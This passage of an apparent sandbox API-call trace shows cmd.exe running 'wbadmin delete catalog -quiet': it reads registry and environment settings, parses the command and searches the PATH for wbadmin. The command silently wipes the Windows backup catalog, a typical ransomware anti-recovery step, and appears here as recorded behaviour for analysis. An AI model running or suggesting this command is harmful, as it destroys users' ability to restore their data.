lpType=0x31ed4c*=0x4, lpData=0x31ed50*=0x40, lpcbData=0x31ed48*=0x4) returned 0x0 [0062.911] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x31ed4c, lpData=0x31ed50, lpcbData=0x31ed48*=0x1000 | out: lpType=0x31ed4c*=0x0, lpData=0x31ed50*=0x40, lpcbData=0x31ed48*=0x1000) returned 0x2 [0062.911] RegCloseKey (hKey=0x68) returned 0x0 [0062.911] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x31ed44 | out: phkResult=0x31ed44*=0x68) returned 0x0 [0062.911] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x31ed4c, lpData=0x31ed50, lpcbData=0x31ed48*=0x1000 | out: lpType=0x31ed4c*=0x0, lpData=0x31ed50*=0x40, lpcbData=0x31ed48*=0x1000) returned 0x2 [0062.911] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x31ed4c, lpData=0x31ed50, lpcbData=0x31ed48*=0x1000 | out: lpType=0x31ed4c*=0x4, lpData=0x31ed50*=0x1, lpcbData=0x31ed48*=0x4) returned 0x0 [0062.911] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x31ed4c, lpData=0x31ed50, lpcbData=0x31ed48*=0x1000 | out: lpType=0x31ed4c*=0x0, lpData=0x31ed50*=0x1, lpcbData=0x31ed48*=0x1000) returned 0x2 [0062.911] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x31ed4c, lpData=0x31ed50, lpcbData=0x31ed48*=0x1000 | out: lpType=0x31ed4c*=0x4, lpData=0x31ed50*=0x0, lpcbData=0x31ed48*=0x4) returned 0x0 [0062.911] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x31ed4c, lpData=0x31ed50, lpcbData=0x31ed48*=0x1000 | out: lpType=0x31ed4c*=0x4, lpData=0x31ed50*=0x9, lpcbData=0x31ed48*=0x4) returned 0x0 [0062.911] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x31ed4c, lpData=0x31ed50, lpcbData=0x31ed48*=0x1000 | out: lpType=0x31ed4c*=0x4, lpData=0x31ed50*=0x9, lpcbData=0x31ed48*=0x4) returned 0x0 [0062.911] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x31ed4c, lpData=0x31ed50, lpcbData=0x31ed48*=0x1000 | out: lpType=0x31ed4c*=0x0, lpData=0x31ed50*=0x9, lpcbData=0x31ed48*=0x1000) returned 0x2 [0062.911] RegCloseKey (hKey=0x68) returned 0x0 [0062.911] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb031ff [0062.911] srand (_Seed=0x5eb031ff) [0062.912] GetCommandLineW () returned="cmd.exe /c wbadmin delete catalog -quiet" [0062.912] GetCommandLineW () returned="cmd.exe /c wbadmin delete catalog -quiet" [0062.912] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ea5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0062.912] GetProcessHeap () returned 0x500000 [0062.912] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x210) returned 0x512008 [0062.912] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x512010, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0062.912] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0062.912] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0062.912] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0062.913] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0062.913] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0062.913] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0062.913] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0062.913] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0062.913] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0062.913] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0062.913] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0062.913] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0062.913] GetProcessHeap () returned 0x500000 [0062.913] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x512ae0 | out: hHeap=0x500000) returned 1 [0062.913] GetEnvironmentStringsW () returned 0x512220* [0062.913] GetProcessHeap () returned 0x500000 [0062.913] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xae2) returned 0x514b80 [0062.913] FreeEnvironmentStringsW (penv=0x512220) returned 1 [0062.913] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0062.913] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0062.913] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0062.913] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0062.914] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0062.914] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0062.914] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0062.914] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0062.914] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0062.914] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0062.914] GetProcessHeap () returned 0x500000 [0062.914] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x54) returned 0x515670 [0062.914] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x31fb10 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0062.914] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x31fb10, lpFilePart=0x31fb0c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x31fb0c*="Desktop") returned 0x25 [0062.914] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0062.914] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x31f88c | out: lpFindFileData=0x31f88c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x511e88 [0062.914] FindClose (in: hFindFile=0x511e88 | out: hFindFile=0x511e88) returned 1 [0062.915] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x31f88c | out: lpFindFileData=0x31f88c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x511e88 [0062.915] FindClose (in: hFindFile=0x511e88 | out: hFindFile=0x511e88) returned 1 [0062.915] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0062.915] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x31f88c | out: lpFindFileData=0x31f88c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd010580, ftLastAccessTime.dwHighDateTime=0x1d62227, ftLastWriteTime.dwLowDateTime=0xd010580, ftLastWriteTime.dwHighDateTime=0x1d62227, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x511e88 [0062.915] FindClose (in: hFindFile=0x511e88 | out: hFindFile=0x511e88) returned 1 [0062.915] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0062.915] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0062.915] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0062.915] GetProcessHeap () returned 0x500000 [0062.915] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x514b80 | out: hHeap=0x500000) returned 1 [0062.915] GetEnvironmentStringsW () returned 0x514090* [0062.915] GetProcessHeap () returned 0x500000 [0062.915] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xb36) returned 0x515ed0 [0062.916] FreeEnvironmentStringsW (penv=0x514090) returned 1 [0062.916] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ea5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0062.916] GetProcessHeap () returned 0x500000 [0062.916] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x515670 | out: hHeap=0x500000) returned 1 [0062.916] GetProcessHeap () returned 0x500000 [0062.916] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x400e) returned 0x516a10 [0062.916] GetProcessHeap () returned 0x500000 [0062.916] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x48) returned 0x511e88 [0062.916] GetProcessHeap () returned 0x500000 [0062.916] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x516a10 | out: hHeap=0x500000) returned 1 [0062.917] GetConsoleOutputCP () returned 0x1b5 [0062.917] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0062.917] GetUserDefaultLCID () returned 0x409 [0062.918] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ea4950, cchData=8 | out: lpLCData=":") returned 2 [0062.918] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x31fc50, cchData=128 | out: lpLCData="0") returned 2 [0062.918] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x31fc50, cchData=128 | out: lpLCData="0") returned 2 [0062.918] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x31fc50, cchData=128 | out: lpLCData="1") returned 2 [0062.918] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49ea4940, cchData=8 | out: lpLCData="/") returned 2 [0062.918] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49ea4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0062.919] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49ea4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0062.919] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49ea4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0062.919] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49ea4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0062.919] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49ea4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0062.919] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49ea4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0062.919] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49ea4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0062.919] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ea4930, cchData=8 | out: lpLCData=".") returned 2 [0062.919] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49ea4920, cchData=8 | out: lpLCData=",") returned 2 [0062.919] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0062.921] GetProcessHeap () returned 0x500000 [0062.921] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x20c) returned 0x512d98 [0062.921] GetConsoleTitleW (in: lpConsoleTitle=0x512d98, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0062.921] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0062.921] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0062.921] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0062.921] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0062.922] GetProcessHeap () returned 0x500000 [0062.922] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x400a) returned 0x516a10 [0062.922] GetProcessHeap () returned 0x500000 [0062.922] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x516a10 | out: hHeap=0x500000) returned 1 [0062.923] _wcsicmp (_String1="wbadmin", _String2=")") returned 78 [0062.923] _wcsicmp (_String1="FOR", _String2="wbadmin") returned -17 [0062.923] _wcsicmp (_String1="FOR/?", _String2="wbadmin") returned -17 [0062.923] _wcsicmp (_String1="IF", _String2="wbadmin") returned -14 [0062.923] _wcsicmp (_String1="IF/?", _String2="wbadmin") returned -14 [0062.923] _wcsicmp (_String1="REM", _String2="wbadmin") returned -5 [0062.923] _wcsicmp (_String1="REM/?", _String2="wbadmin") returned -5 [0062.923] GetProcessHeap () returned 0x500000 [0062.923] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x58) returned 0x512fb0 [0062.923] GetProcessHeap () returned 0x500000 [0062.923] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x513010 [0062.924] GetProcessHeap () returned 0x500000 [0062.924] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x36) returned 0x513030 [0062.925] GetConsoleTitleW (in: lpConsoleTitle=0x31f948, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0062.926] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19 [0062.926] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18 [0062.926] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19 [0062.926] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3 [0062.926] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20 [0062.926] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20 [0062.926] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20 [0062.926] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5 [0062.926] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5 [0062.926] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18 [0062.926] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4 [0062.926] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7 [0062.926] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19 [0062.926] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3 [0062.926] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7 [0062.926] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10 [0062.926] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10 [0062.926] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5 [0062.926] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5 [0062.926] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7 [0062.926] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16 [0062.926] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4 [0062.926] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20 [0062.927] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20 [0062.927] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1 [0062.927] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1 [0062.927] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1 [0062.927] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18 [0062.927] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4 [0062.927] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18 [0062.927] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3 [0062.927] _wcsicmp (_String1="wbadmin", _String2="START") returned 4 [0062.927] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19 [0062.927] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12 [0062.927] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10 [0062.927] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7 [0062.927] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7 [0062.927] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22 [0062.927] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17 [0062.927] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21 [0062.927] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20 [0062.927] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10 [0062.927] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19 [0062.927] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18 [0062.927] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19 [0062.927] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3 [0062.928] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20 [0062.928] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20 [0062.928] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20 [0062.928] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5 [0062.928] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5 [0062.928] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18 [0062.928] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4 [0062.928] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7 [0062.928] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19 [0062.928] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3 [0062.928] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7 [0062.928] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10 [0062.928] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10 [0062.928] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5 [0062.928] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5 [0062.928] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7 [0062.928] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16 [0062.928] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4 [0062.928] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20 [0062.928] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20 [0062.928] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1 [0062.928] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1 [0062.928] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1 [0062.929] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18 [0062.929] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4 [0062.929] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18 [0062.929] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3 [0062.929] _wcsicmp (_String1="wbadmin", _String2="START") returned 4 [0062.929] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19 [0062.929] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12 [0062.929] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10 [0062.929] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7 [0062.929] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7 [0062.929] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22 [0062.929] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17 [0062.929] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21 [0062.929] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20 [0062.929] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10 [0062.929] _wcsicmp (_String1="wbadmin", _String2="FOR") returned 17 [0062.929] _wcsicmp (_String1="wbadmin", _String2="IF") returned 14 [0062.929] _wcsicmp (_String1="wbadmin", _String2="REM") returned 5 [0062.930] GetProcessHeap () returned 0x500000 [0062.930] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x210) returned 0x513070 [0062.930] GetProcessHeap () returned 0x500000 [0062.930] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x46) returned 0x513288 [0062.930] _wcsnicmp (_String1="wbad", _String2="cmd ", _MaxCount=0x4) returned 20 [0062.930] GetProcessHeap () returned 0x500000 [0062.930] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x418) returned 0x5007f0 [0062.930] SetErrorMode (uMode=0x0) returned 0x0 [0062.931] SetErrorMode (uMode=0x1) returned 0x0 [0062.932] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5007f8, lpFilePart=0x31f468 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x31f468*="Desktop") returned 0x25 [0062.932] SetErrorMode (uMode=0x0) returned 0x1 [0062.932] GetProcessHeap () returned 0x500000 [0062.932] RtlReAllocateHeap (Heap=0x500000, Flags=0x0, Ptr=0x5007f0, Size=0x64) returned 0x5007f0 [0062.932] GetProcessHeap () returned 0x500000 [0062.932] RtlSizeHeap (HeapHandle=0x500000, Flags=0x0, MemoryPointer=0x5007f0) returned 0x64 [0062.932] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0062.932] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0062.932] GetProcessHeap () returned 0x500000 [0062.932] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x120) returned 0x5132d8 [0062.932] GetProcessHeap () returned 0x500000 [0062.932] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x238) returned 0x500860 [0063.239] GetProcessHeap () returned 0x500000 [0063.239] RtlReAllocateHeap (Heap=0x500000, Flags=0x0, Ptr=0x500860, Size=0x122) returned 0x500860 [0063.239] GetProcessHeap () returned 0x500000 [0063.239] RtlSizeHeap (HeapHandle=0x500000, Flags=0x0, MemoryPointer=0x500860) returned 0x122 [0063.239] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0063.239] GetProcessHeap () returned 0x500000 [0063.239] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xe0) returned 0x513400 [0063.239] RtlReAllocateHeap (Heap=0x500000, Flags=0x0, Ptr=0x513400, Size=0x76) returned 0x513400 [0063.239] GetProcessHeap () returned 0x500000 [0063.239] RtlSizeHeap (HeapHandle=0x500000, Flags=0x0, MemoryPointer=0x513400) returned 0x76 [0063.661] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0063.661] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x31f1e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31f1e4) returned 0xffffffff [0063.661] GetLastError () returned 0x2 [0063.661] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x31f1e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31f1e4) returned 0xffffffff [0063.661] GetLastError () returned 0x2 [0063.661] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0063.662] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x31f1e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31f1e4) returned 0xffffffff [0063.662] GetLastError () returned 0x2 [0063.662] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x31f1e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31f1e4) returned 0xffffffff [0063.662] GetLastError () returned 0x2 [0063.662] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0063.662] FindFirstFileExW (in: lpFileName="C:\\Windows\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x31f1e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31f1e4) returned 0xffffffff [0063.662] GetLastError () returned 0x2 [0063.663] FindFirstFileExW (in: lpFileName="C:\\Windows\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x31f1e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31f1e4) returned 0xffffffff [0063.663] GetLastError () returned 0x2 [0063.663] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0063.663] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x31f1e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31f1e4) returned 0xffffffff [0063.663] GetLastError () returned 0x2 [0063.663] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x31f1e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31f1e4) returned 0xffffffff [0063.664] GetLastError () returned 0x2 [0063.664] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0063.664] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x31f1e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31f1e4) returned 0xffffffff [0063.667] GetLastError () returned 0x2 [0063.667] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x31f1e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31f1e4) returned 0xffffffff [0063.670] GetLastError () returned 0x2 [0064.393] _get_osfhandle (_FileHandle=2) returned 0xb [0064.393] GetFileType (hFile=0xb) returned 0x2 [0064.394] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0064.394] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x31f638 | out: lpMode=0x31f638) returned 1 [0064.394] _get_osfhandle (_FileHandle=2) returned 0xb [0064.394] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x31f66c | 